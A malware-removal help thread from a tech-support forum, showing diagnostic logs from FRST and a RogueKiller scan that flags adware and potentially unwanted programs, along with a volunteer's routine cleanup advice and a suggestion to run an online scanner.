FirewallRules: [UDP Query User{DCFA2E94-61CF-4517-A82F-AA51C00BB916}C:\program files (x86)\java\jre1.8.0_73\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_73\bin\javaw.exe No File
FirewallRules: [{9B9900F7-F341-4F67-A222-BA5ADB3D415F}] => (Block) C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WShelper.exe No File
FirewallRules: [{C27B1110-1C16-4970-BA34-D7815EC04CD1}] => (Allow) c:\program files (x86)\opera\63.0.3368.107\opera.exe (Opera Software AS -> Opera Software)
FirewallRules: [{5F4157A8-99BC-42D7-9E0B-83BC577FB74E}] => (Allow) c:\program files (x86)\opera\64.0.3417.92\opera.exe (Opera Software AS -> Opera Software)
FirewallRules: [{E312F188-3203-4E00-8BD8-6B9B54F77B8A}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
 
==================== Restore Points =========================
 
16-11-2019 17:22:21 Removed Betternet for Windows 5.3.0.433
18-11-2019 19:29:54 Removed Nero 8. Available with Windows Installer version 1.2 and later.
 
==================== Faulty Device Manager Devices ============
 
 
==================== Event log errors: ========================
 
Application errors:
==================
 
System errors:
=============
Error: (11/19/2019 03:29:16 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Windows Update service hung on starting.
 
Error: (11/19/2019 03:23:27 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Freemake Improver service failed to start due to the following error: 
The service did not respond to the start or control request in a timely fashion.
 
Error: (11/19/2019 03:23:27 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Freemake Improver service to connect.
 
Error: (11/19/2019 03:12:50 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Windows Error Reporting Service service to connect.
 
Error: (11/19/2019 02:52:45 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Windows Update service hung on starting.
 
 
CodeIntegrity:
===================================
 
Date: 2019-11-19 15:26:48.206
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-11-19 15:20:24.280
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-11-19 15:05:21.873
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-11-19 15:00:01.558
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-11-19 14:48:29.683
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
==================== Memory info =========================== 
 
BIOS: FUJITSU // Phoenix Technologies Ltd. Version 1.08 10/02/2012
Motherboard: FUJITSU FJNBB29
Processor: Intel® Pentium® CPU B960 @ 2.20GHz
Percentage of memory in use: 79%
Total physical RAM: 3447.63 MB
Available physical RAM: 709.1 MB
Total Virtual: 6893.39 MB
Available Virtual: 3823.54 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:97.56 GB) (Free:37.81 GB) NTFS
Drive d: (New Volume) (Fixed) (Total:368.1 GB) (Free:205.66 GB) NTFS
 
\\?\Volume{da4eedc3-7be1-11e2-8ac3-806e6f6e6963}\ () (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS
 
==================== MBR & Partition Table ====================
 
==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: EB90EB90)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=97.6 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=368.1 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt =======================


#13
RKinner


    Malware Expert

  • Expert
  • 24,598 posts
  • MVP

See if you can get Rogue Killer to run:

 

Rogue Killer

http://www.adlice.co...iller/#download

Portable 64 bits <==Use this one

Download and Save.



Right click on the downloaded file (RogueKillerX64.exe or RogueKiller.exe) and Run As admin

Start Scan
Start Scan

Will take about 20 minutes to complete.

Open Report
Export TXT (save it to your desktop as rk) Save

Do not let Rogue Killer remove anything until you hear from me.  Leave Rogue Killer up (but minimized) so you won't have to rescan.

Open rk.txt and copy and paste it to your next Reply.
 



#14
vladana_91


    Member

  • Topic Starter
  • Member
  • PipPip
  • 18 posts

Copy of rk.txt:

 

RogueKiller Anti-Malware V13.5.6.0 (x64) [Nov  7 2019] (Free) by Adlice Software
Operating System : Windows 7 (6.1.7600) 64 bits
Started in : Normal mode
User : Vladana [Administrator]
Started from : D:\Vladana #4\Programs\Azureus\Downloaded\RogueKiller_portable64.exe
Signatures : 20191119_104519, Driver : Loaded
Mode : Standard Scan, Scan -- Date : 2019/11/19 19:58:30 (Duration : 00:56:05)
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Processes ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
[PUP.Gen1|PUP.Popcorn (Potentially Malicious)] Updater.exe (3620) -- C:\Program Files (x86)\Popcorn Time\Updater.exe -> Found
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Process Modules ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Services ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Tasks ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Registry ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
>>>>>> XX - Software
  [PUP.Reimage|PUP.Gen1 (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\Software\Reimage -- N/A -> Found
  [PUP.Popcorn (Potentially Malicious)] (X64) HKEY_USERS\S-1-5-21-7682389-3612777877-391866582-1000\Software\Popcorn Time -- N/A -> Found
  [PUP.Popcorn (Potentially Malicious)] (X64) HKEY_USERS\S-1-5-21-7682389-3612777877-391866582-1000\Software\PopcornTime -- N/A -> Found
  [PUP.Gen1 (Potentially Malicious)] (X64) HKEY_USERS\S-1-5-21-7682389-3612777877-391866582-1000\Software\Softonic -- N/A -> Found
  [PUP.Gen1 (Potentially Malicious)] (X64) HKEY_USERS\S-1-5-21-7682389-3612777877-391866582-1000\Software\WebApp -- N/A -> Found
>>>>>> O23 - Services
  [PUP.Gen1|PUP.Popcorn (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Update service -- "C:\Program Files (x86)\Popcorn Time\Updater.exe" -> Found
  [PUP.Gen1|PUP.Popcorn (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Update service -- "C:\Program Files (x86)\Popcorn Time\Updater.exe" -> Found
>>>>>> O87 - Firewall
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{787EA532-6389-4D57-8CB4-56ED49F60E38} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|App=C:\Users\Vladana\AppData\Local\ROX Player\roxplayer.exe|Name=ROX Player| (C:\Users\Vladana\AppData\Local\ROX Player\roxplayer.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{F0F6824E-F9E8-401C-92A1-52EE1D31841E} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=C:\Users\Vladana\AppData\Local\ROX Player\roxplayer.exe|Name=ROX Player| (C:\Users\Vladana\AppData\Local\ROX Player\roxplayer.exe) (missing) -> Found
  [PUP.Gen1|PUP.Popcorn (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|TCP Query User{EBCB1A48-8CAD-40A0-97C9-A5E7D1969006}C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|Profile=Public|App=C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe|Name=popcorn time.exe|Desc=popcorn time.exe|Defer=User| (C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe) (missing) -> Found
  [PUP.Gen1|PUP.Popcorn (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|UDP Query User{51B1713E-C3DC-4E9B-8B2E-299D5D7EB37D}C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|Profile=Public|App=C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe|Name=popcorn time.exe|Desc=popcorn time.exe|Defer=User| (C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe) (missing) -> Found
  [PUP.Gen1|PUP.Popcorn (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|TCP Query User{1028E6BB-11FD-426E-9846-980F150B8359}C:\users\vladana\appdata\local\popcorn time\nw.exe -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|Profile=Public|App=C:\users\vladana\appdata\local\popcorn time\nw.exe|Name=nw.exe|Desc=nw.exe|Defer=User| (C:\users\vladana\appdata\local\popcorn time\nw.exe) (missing) -> Found
  [PUP.Gen1|PUP.Popcorn (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|UDP Query User{131B9741-3987-48AB-97A9-8EB722A5AD2D}C:\users\vladana\appdata\local\popcorn time\nw.exe -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|Profile=Public|App=C:\users\vladana\appdata\local\popcorn time\nw.exe|Name=nw.exe|Desc=nw.exe|Defer=User| (C:\users\vladana\appdata\local\popcorn time\nw.exe) (missing) -> Found
  [PUP.Gen1|PUP.Popcorn (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{DE2D1B1A-A95A-4427-8BD7-97016C528F99} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|App=C:\Program Files (x86)\Popcorn Time\Updater.exe|Name=Updater.exe| (C:\Program Files (x86)\Popcorn Time\Updater.exe) -> Found
  [PUP.Gen1|PUP.Popcorn (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{023EC48C-AAA6-4832-8DEF-E77068991D61} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=C:\Program Files (x86)\Popcorn Time\Updater.exe|Name=Updater.exe| (C:\Program Files (x86)\Popcorn Time\Updater.exe) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{ED5D1E50-0E04-48A8-A0FF-52EBBC8DC18D} -- v2.10|Action=Allow|Active=TRUE|Dir=Out|App=C:\Users\Vladana\AppData\Local\Temp\Andy_46.2_x64\Setup.exe|Name=AndySetupOut| (C:\Users\Vladana\AppData\Local\Temp\Andy_46.2_x64\Setup.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{2F79B4C8-3AFC-4E30-B1B2-EE4203877302} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Users\Vladana\AppData\Local\Temp\Uninstall.exe|Name=AndyRemoveInTemp| (C:\Users\Vladana\AppData\Local\Temp\Uninstall.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{FEE98E1E-A352-4C6D-A55F-F641B4E69F55} -- v2.10|Action=Allow|Active=TRUE|Dir=Out|App=C:\Users\Vladana\AppData\Local\Temp\Uninstall.exe|Name=AndyRemoveOutTemp| (C:\Users\Vladana\AppData\Local\Temp\Uninstall.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{7AB977CD-EA90-4ECA-865F-E3924B0DEBC6} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe|Name=HD-OBS| (C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{9FDF76F3-5DF0-4A94-B6C4-F6F10388EEDD} -- v2.10|Action=Allow|Active=TRUE|Dir=Out|App=C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe|Name=HD-OBS| (C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{9E97B312-F759-4491-9B4A-9A7F7BD66B49} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe|Name=HD-OBS| (C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{3B74B220-3059-4A75-949E-50972E487A28} -- v2.10|Action=Allow|Active=TRUE|Dir=Out|App=C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe|Name=HD-OBS| (C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{187F27A2-9AE2-489B-B927-B8FC03CC268B} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe|Name=HD-OBS| (C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{A9130200-545F-467A-9A36-1B798C073847} -- v2.10|Action=Allow|Active=TRUE|Dir=Out|App=C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe|Name=HD-OBS| (C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{7F1F91ED-8AE2-4EF5-8A6E-42BCE82D179B} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe|Name=HD-OBS| (C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{5DEA6D27-54CF-4606-949E-BD3C17E5B786} -- v2.10|Action=Allow|Active=TRUE|Dir=Out|App=C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe|Name=HD-OBS| (C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{787EA532-6389-4D57-8CB4-56ED49F60E38} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|App=C:\Users\Vladana\AppData\Local\ROX Player\roxplayer.exe|Name=ROX Player| (C:\Users\Vladana\AppData\Local\ROX Player\roxplayer.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{F0F6824E-F9E8-401C-92A1-52EE1D31841E} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=C:\Users\Vladana\AppData\Local\ROX Player\roxplayer.exe|Name=ROX Player| (C:\Users\Vladana\AppData\Local\ROX Player\roxplayer.exe) (missing) -> Found
  [PUP.Gen1|PUP.Popcorn (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|TCP Query User{EBCB1A48-8CAD-40A0-97C9-A5E7D1969006}C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|Profile=Public|App=C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe|Name=popcorn time.exe|Desc=popcorn time.exe|Defer=User| (C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe) (missing) -> Found
  [PUP.Gen1|PUP.Popcorn (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|UDP Query User{51B1713E-C3DC-4E9B-8B2E-299D5D7EB37D}C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|Profile=Public|App=C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe|Name=popcorn time.exe|Desc=popcorn time.exe|Defer=User| (C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe) (missing) -> Found
  [PUP.Gen1|PUP.Popcorn (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|TCP Query User{1028E6BB-11FD-426E-9846-980F150B8359}C:\users\vladana\appdata\local\popcorn time\nw.exe -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|Profile=Public|App=C:\users\vladana\appdata\local\popcorn time\nw.exe|Name=nw.exe|Desc=nw.exe|Defer=User| (C:\users\vladana\appdata\local\popcorn time\nw.exe) (missing) -> Found
  [PUP.Gen1|PUP.Popcorn (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|UDP Query User{131B9741-3987-48AB-97A9-8EB722A5AD2D}C:\users\vladana\appdata\local\popcorn time\nw.exe -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|Profile=Public|App=C:\users\vladana\appdata\local\popcorn time\nw.exe|Name=nw.exe|Desc=nw.exe|Defer=User| (C:\users\vladana\appdata\local\popcorn time\nw.exe) (missing) -> Found
  [PUP.Gen1|PUP.Popcorn (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{DE2D1B1A-A95A-4427-8BD7-97016C528F99} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|App=C:\Program Files (x86)\Popcorn Time\Updater.exe|Name=Updater.exe| (C:\Program Files (x86)\Popcorn Time\Updater.exe) -> Found
  [PUP.Gen1|PUP.Popcorn (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{023EC48C-AAA6-4832-8DEF-E77068991D61} -- v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=C:\Program Files (x86)\Popcorn Time\Updater.exe|Name=Updater.exe| (C:\Program Files (x86)\Popcorn Time\Updater.exe) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{ED5D1E50-0E04-48A8-A0FF-52EBBC8DC18D} -- v2.10|Action=Allow|Active=TRUE|Dir=Out|App=C:\Users\Vladana\AppData\Local\Temp\Andy_46.2_x64\Setup.exe|Name=AndySetupOut| (C:\Users\Vladana\AppData\Local\Temp\Andy_46.2_x64\Setup.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{2F79B4C8-3AFC-4E30-B1B2-EE4203877302} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Users\Vladana\AppData\Local\Temp\Uninstall.exe|Name=AndyRemoveInTemp| (C:\Users\Vladana\AppData\Local\Temp\Uninstall.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{FEE98E1E-A352-4C6D-A55F-F641B4E69F55} -- v2.10|Action=Allow|Active=TRUE|Dir=Out|App=C:\Users\Vladana\AppData\Local\Temp\Uninstall.exe|Name=AndyRemoveOutTemp| (C:\Users\Vladana\AppData\Local\Temp\Uninstall.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{7AB977CD-EA90-4ECA-865F-E3924B0DEBC6} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe|Name=HD-OBS| (C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{9FDF76F3-5DF0-4A94-B6C4-F6F10388EEDD} -- v2.10|Action=Allow|Active=TRUE|Dir=Out|App=C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe|Name=HD-OBS| (C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{9E97B312-F759-4491-9B4A-9A7F7BD66B49} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe|Name=HD-OBS| (C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{3B74B220-3059-4A75-949E-50972E487A28} -- v2.10|Action=Allow|Active=TRUE|Dir=Out|App=C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe|Name=HD-OBS| (C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{187F27A2-9AE2-489B-B927-B8FC03CC268B} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe|Name=HD-OBS| (C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{A9130200-545F-467A-9A36-1B798C073847} -- v2.10|Action=Allow|Active=TRUE|Dir=Out|App=C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe|Name=HD-OBS| (C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{7F1F91ED-8AE2-4EF5-8A6E-42BCE82D179B} -- v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe|Name=HD-OBS| (C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe) (missing) -> Found
  [Suspicious.Path (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules|{5DEA6D27-54CF-4606-949E-BD3C17E5B786} -- v2.10|Action=Allow|Active=TRUE|Dir=Out|App=C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe|Name=HD-OBS| (C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe) (missing) -> Found
>>>>>> XX - System Policies
  [PUM.Policies (Potentially Malicious)] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System|ConsentPromptBehaviorAdmin -- 0 -> Found
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ WMI ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Hosts File ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Files ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
[PUP.Popcorn (Potentially Malicious)] (folder) PopcornTimeDesktop -- C:\Users\Vladana\AppData\Local\PopcornTimeDesktop -> Found
[Adw.HotspotShield (Malicious)] (folder) Hotspot Shield -- C:\ProgramData\Hotspot Shield -> Found
[PUP.InstallPack (Potentially Malicious)] (folder) InstallMate -- C:\ProgramData\InstallMate -> Found
[PUP.Gen1 (Potentially Malicious)] (folder) SoftSafe -- C:\ProgramData\SoftSafe -> Found
[PUP.Gen1|PUP.Popcorn (Potentially Malicious)] (folder) Popcorn Time -- C:\Program Files (x86)\Popcorn Time -> Found
[PUP.Gen1 (Potentially Malicious)] (folder) WebSearch -- C:\Program Files (x86)\WebSearch -> Found
 
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Web browsers ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

  • 0

#15
RKinner

RKinner

    Malware Expert

  • Expert
  • 24,598 posts
  • MVP

Sorry for the delay. Just got up from a nap.

 

It doesn't look like it found anything really nasty. As far as I know Popcorn Time is not really that bad. If you want to keep it (uncheck the lines that mention it) that's OK. Won't hurt to let it remove the other stuff it found. The missing files in the firewall list stuff is just left from when you uninstalled something and it didn't patch the firewall. I can see that in FRST but it was too much trouble to put them in a fixlist. Might as well let RK remove them.

 

Wife says we have to go to a meeting now.  See if you can run ESET's free scanner:

 

https://www.eset.com...online-scanner/

 

Click on Free One Time Scan and follow the instructions.  May take a few hours to complete.


  • 0





